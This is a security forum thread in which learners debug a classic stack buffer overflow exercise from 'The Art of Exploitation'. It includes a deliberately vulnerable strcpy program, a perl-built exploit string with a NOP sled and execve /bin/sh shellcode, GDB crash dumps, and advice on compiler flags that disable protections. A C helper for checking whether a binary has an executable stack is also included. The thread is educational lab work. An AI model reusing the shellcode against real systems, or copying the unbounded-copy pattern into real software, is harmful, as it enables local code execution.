EH-Net
May 18, 2013, 05:53:04 PM *
Author Topic: Buffer Overflows and Nop Sled  (Read 3603 times)
digitalvampire
« on: January 04, 2013, 02:59:56 PM »

Hey Guys,
(Not sure if this is a double post, I sent one in a few mins ago but it didn't seem to take)

I've been playing around with Buffer Overflows this week, and I seem to be running into a strange issue.  I am going to try my best to explain it.

I've been working with the examples in "The Art of Exploitation" The first one is vuln.c and here is the code:

Code:
#include <string.h>   /* strcpy */

int main(int argc, char *argv[])
{
   char buffer[500];
   strcpy(buffer, argv[1]);   /* unbounded copy into a 500-byte stack buffer: the overflow under study */
   return 0;
}


I compiled the program with the -fno-stack-protector and the -mpreferred-stack-boundary=2 and I've also made sure ASLR is off (running Ubuntu 12.10 in a vm)

I've been calculating my return address from subtracting about 400 from the ESP value after the buffer has been added onto the stack.  I figured this is where the nop sled should be.  I have actually gotten it to the point where it will segfault and print out that address that I was throwing at it, but I guess I'm curious why if EIP has that address it's not launching the sled and sliding down to my shellcode?  I'm aware of the divisible by 4 rule, and I'm pretty sure I have that in place too..

Here is the GDB session with the info I'm throwing at it:

Code:
Starting program: /root/aeh/bof/vulnerableapp `perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

Breakpoint 1, main (argc=2, argv=0xbffff604) at vul.c:8
8               strcpy(buffer, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff18a in ?? ()


Any ideas on how to attack this next?  I'd really like to learn this, it's rather exciting :)

Thanks in advance for all your help!

Sincerely,

-DV

« Last Edit: January 04, 2013, 03:37:25 PM by digitalvampire »
ajohnson (aka dynamik)
« Reply #1 on: January 04, 2013, 04:55:57 PM »

I'd try to find out what your exact offset is through a cyclic pattern (i.e. pattern_create.rb) or a binary tree analysis. I wouldn't just ballpark approximate values.

What address are you submitting to EIP? It should be something like a jmp esp address, not an address somewhere in your NOP sled.

It's kind of difficult to troubleshoot your issue without the register values, stack contents, full exploit, etc.

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
digitalvampire
« Reply #2 on: January 04, 2013, 05:09:23 PM »

Thanks, that actually helps a lot..!

Is there a way through gdb I can dump the full contents of the stack?

I've actually been trying to exploit it via command line for now using:

Code:
`perl -e 'print "\x90" x 300 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x8a\xf1\xff\xbf" x 45'`

I was submitting this address for the EIP: 0xbffff18a

Except I submitted it via Little Endian style.

I thought if I pointed it to an address in the Nop Sled, it would slide down to the code?  

Thanks again!! :)

*Edit:

After getting a whole bunch of strewn test files everywhere, I started clean, but still with the same issue.  Here is a dump of the EIP after the segfault.

Code:
Program received signal SIGSEGV, Segmentation fault.
0xbffff4a4 in ?? ()
(gdb) x/20x $eip
0xbffff4a4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4b4:     0x31909090      0x01ec83c0      0x68240488      0x68736162
0xbffff4c4:     0x6e696268      0x01ec832f      0x2f2404c6      0x5650e689
0xbffff4d4:     0xf3890bb0      0xd231e189      0x01b080cd      0x80cddb31
0xbffff4e4:     0xbffff4a4      0xbffff4a4      0xbffff4a4      0xbffff4a4
(gdb)


The repeated return address entered was: 0xbffff4a4, which looks almost successful, as the segfault is giving me that as its value for EIP.  Why is it stopping here?  I have ideas but they are somewhat mangled :)

Thanks!!
« Last Edit: January 04, 2013, 07:19:19 PM by digitalvampire »
superkojiman
« Reply #3 on: January 05, 2013, 09:43:40 PM »

I was able to exploit the example on Ubuntu 10.04, but only by compiling it with -z execstack. That is:

gcc -fno-stack-protector -mpreferred-stack-boundary=2 -ggdb -o vuln -z execstack vuln.c

The book comes with a live CD that should turn off (or not include) certain security features that would prevent the exploits from working. I would suggest using that while going through the exploit examples.

Some references that might be helpful if you do choose to use a more current Linux distribution:

https://www.soldierx.com/tutorials/Stack-Smashing-Modern-Linux-System
http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/

OSCP, GSEC
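An added example (mine, not from the thread or from the book): a crash with EIP parked on the 0x90 bytes, as in the dump above, is what a non-executable stack produces, and linking with -z execstack changes that by setting the PF_X bit on the binary's PT_GNU_STACK program header. The C program below reads that header from a compiled binary so you can see which way it was built; it assumes little-endian ELF32/ELF64 input and uses constructed minimal images for its self-check.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rd32(const unsigned char *p) { return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(unsigned char *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> 8 * i); }
/* 1 = PT_GNU_STACK carries PF_X (what linking with "-z execstack" produces), 0 = PT_GNU_STACK
 * without PF_X (non-executable stack), -1 = not ELF, truncated, or no PT_GNU_STACK header.
 * Little-endian ELF32/ELF64 only; the first few KiB of a file normally hold the table. */
int stack_is_executable(const unsigned char *img, size_t len) {
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0) return -1;
    int is64 = img[4] == 2; if (is64 && len < 64) return -1;   /* EI_CLASS: 1 = ELF32, 2 = ELF64 */
    uint64_t phoff = is64 ? rd32(img + 32) | (uint64_t)rd32(img + 36) << 32 : rd32(img + 28);
    uint16_t phentsize = rd16(img + (is64 ? 54 : 42)), phnum = rd16(img + (is64 ? 56 : 44));
    size_t flags_off = is64 ? 4 : 24;              /* p_flags sits at 4 in Elf64_Phdr, 24 in Elf32_Phdr */
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (phentsize < flags_off + 4 || off + phentsize > len) return -1;
        if (rd32(img + off) == 0x6474e551u)        /* PT_GNU_STACK */
            return (rd32(img + off + flags_off) & 1u) ? 1 : 0;   /* PF_X */
    }
    return -1;
}
/* Constructed test image: an ELF header followed by a single PT_GNU_STACK entry. */
size_t make_image(unsigned char *out, int is64, uint32_t flags) {
    size_t ehsize = is64 ? 64 : 52, phsize = is64 ? 56 : 32; memset(out, 0, ehsize + phsize);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = is64 ? 2 : 1; out[5] = 1;             /* EI_CLASS, EI_DATA = little-endian */
    out[is64 ? 32 : 28] = (unsigned char)ehsize;   /* e_phoff: table right after the header */
    out[is64 ? 54 : 42] = (unsigned char)phsize;   /* e_phentsize */
    out[is64 ? 56 : 44] = 1;                       /* e_phnum */
    wr32(out + ehsize, 0x6474e551u); wr32(out + ehsize + (is64 ? 4 : 24), flags); /* p_type, p_flags */
    return ehsize + phsize;
}
/* Self-check helper: classify a constructed image with the given p_flags (PF_R=4, PF_W=2, PF_X=1). */
int check_image(int is64, uint32_t flags) {
    unsigned char img[128];
    return stack_is_executable(img, make_image(img, is64, flags));
}

int main(int argc, char **argv) {
    unsigned char buf[4096]; FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (!f) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    size_t n = fread(buf, 1, sizeof buf, f); fclose(f);
    int r = stack_is_executable(buf, n);
    puts(r == 1 ? "GNU_STACK RWE: executable stack" : r == 0 ? "GNU_STACK RW: non-executable stack" : "no GNU_STACK header / not an ELF file");
    return r == 1;
}
```

Running it on a vuln binary built with and without -z execstack shows the two outcomes; `readelf -lW vuln | grep GNU_STACK` reports the same flags (RWE versus RW) if you would rather use the standard tool.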
ajohnson (aka dynamik)
« Reply #4 on: January 05, 2013, 10:51:59 PM »

+1 to just using the accompanying CD: http://nostarch.com/hackingCD.htm

That'll remove a lot of the weird variables that may unexpectedly crop up on more recent Linux distros (i.e. default GCC protections).

The book doesn't address them, so not going through it as intended will result in unnecessary headaches. Superkojiman provided good resources for further study.

WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
H1t M0nk3y
« Reply #5 on: January 07, 2013, 07:11:46 AM »

You can also take a look at some very good and free video tutorials from securitytube.net.

Buffer Overflow Exploitation Megaprimer for Linux: http://www.securitytube.net/groups?operation=view&groupId=4

Good luck!

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
digitalvampire
« Reply #6 on: January 07, 2013, 10:13:45 AM »

Thanks guys! :)  I too figured out that there was something weird going on, and switched to using DVL to compile, which seemed to work.  I did not know about that extra switch for gcc though; I'm going to try it on my Ubuntu machine.

I have the original book, 1st edition, which doesn't have the CD, but I think with that extra compile parameter it should work better, and if not I can keep compiling in DVL.

The SecurityTube videos are great; I went through those recently and always look forward to him adding more. I have been meaning to try the Python series when I get a chance. (I'm a python fanatic.)

Thanks again guys!! :)

-DV
hayabusa
« Reply #7 on: January 07, 2013, 11:34:26 AM »

The Python series is great, too.  You'll enjoy it.

~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
superkojiman
« Reply #8 on: January 07, 2013, 12:06:56 PM »

Quote from: digitalvampire
I have the original book, 1st edition which doesn't have the CD - but I think with that extra compile parameter it should work better.. and if not I can keep compiling in DVL.

The link ajohnson provided has a link that allows you to download the ISO in case the CD that came with the book is broken (or in your case, not included). Here's the direct link to the ISO: http://www.mininova.org/tor/2533556

OSCP, GSEC
digitalvampire
« Reply #9 on: January 08, 2013, 04:51:14 AM »

Thanks again! :)  I will definitely get that CD, especially since it was designed specifically for the exercises in the book.

Thanks !!

-DV